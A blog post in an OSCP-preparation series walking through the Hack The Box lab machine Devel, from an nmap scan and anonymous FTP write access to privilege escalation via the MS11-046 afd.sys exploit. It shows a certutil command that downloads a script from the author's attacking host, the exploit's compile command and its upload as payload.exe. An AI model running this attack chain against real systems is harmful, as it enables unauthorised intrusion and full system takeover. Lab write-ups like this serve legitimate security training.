Path to OSCP: Devel

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Devel. We begin as usual with nmap:

u01@nostromo :~ $sudo nmap -p- -A devel.htb-oA devel
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 14:42 BST
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.022s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_serv
er_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Win
dows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R
2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (8
9%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Wind
ows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 23.36 ms 10.10.14.1
2 23.65 ms devel.htb (10.10.10.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.46 seconds

We have both anonymous access to FTP and write access to the FTP root directory. Promising start.

u01@nostromo:~ $ftp anonymous@devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49186|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

ftp> put /home/u01/testfile ./testfile
local: /home/u01/testfile remote: ./testfile
229 Entering Extended Passive Mode (|||49224|)
125 Data connection already open; Transfer starting.
0        0.00 KiB/s
226 Transfer complete.
ftp> dir
229 Entering Extended Passive Mode (|||49225|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
08-18-23  05:57PM                    0 testfile
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

I do some manual enumeration, digging around directories and outputting systeminfo. I wanted to use an enumeration script, primarily to refresh my memory on uploading from a Windows cmd shell and the output from the likes of winPEAS. We have write access to C:\Windows\Temp, so I upload winPEAS using certutil and run it:

c:\windows\system32\inetsrv>cd c:\windows\temp\test
cd c:\windows\temp\test

c:\Windows\Temp\test>certutil.exe -urlcache -split -f "http://10.10.14.12:8888/winPEAS.bat" peas.bat
certutil.exe -urlcache -split -f "http://10.10.14.12:8888/winPEAS.bat" peas.bat


**** Online ****
0000 ...
8c6a
CertUtil: -URLCache command completed successfully.

c:\Windows\Temp\test>
c:\Windows\Temp\test>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971

Directory of c:\Windows\Temp\test

31/08/2023 07:12 <DIR> .
31/08/2023 07:12 <DIR> ..
31/08/2023 07:12 35.946 peas.bat
1 File(s) 35.946 bytes
2 Dir(s) 4.697.214.976 bytes free
c:\Windows\Temp\test>.\peas.bat

I also upload and run Windows Exploit Suggester – Next Generation (WES-NG), but I get the impression that this box is so old that the output from both these tools and the number of missing patches at this stage is overwhelming; WES-NG reports 236 vulnerabilities!

So rather than sift through all those, I simply take the direct route and Google the Windows version and build; after so many years, if there’s an exploit for this build, it’s going to be pretty obvious. And sure enough, a search for “Windows 7 Enterprise 6.1.7600 Build 7600” without even specifying “vulnerability” or “exploit” brings me to MS11-046, afd.sys local privilege escalation (Microsoft Windows (x86) – ‘afd.sys’ Local Privilege Escalation (MS11-046) – Windows_x86 local Exploit (exploit-db.com)).

Searchsploit has an entry for it:

u01@nostromo:/repo/wesng$ searchsploit ms11-046
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046) | windows/dos/18755.c
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------

I follow the instructions in the file comments to compile the binary:

u01@nostromo:~/HTB/devel$ i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
u01@nostromo:~/HTB/devel$ ll
total 284
-rw-r--r-- 1 u01 u01 31852 Aug 31 15:10 40564.c
-rwxr-xr-x 1 u01 u01 239983 Aug 31 15:11 MS11-046.exe

I upload the payload (in binary mode) to the same directory as our initial shell:

u01@nostromo:~/HTB/devel$ ftp anonymous@devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put ~/HTB/devel/MS11-046.exe payload.exe
local: /home/u01/HTB/devel/MS11-046.exe remote: payload.exe
229 Entering Extended Passive Mode (|||49167|)
150 Opening BINARY mode data connection.
100% |***************************************************************************************************************| 234 KiB 1.27 MiB/s 00:00 ETA
226 Transfer complete.
239983 bytes sent in 00:00 (938.52 KiB/s)

And on execution we get instant system and can retrieve all flags:

c:\inetpub\wwwroot>payload.exe
payload.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Leave a Reply

Your email address will not be published. Required fields are marked *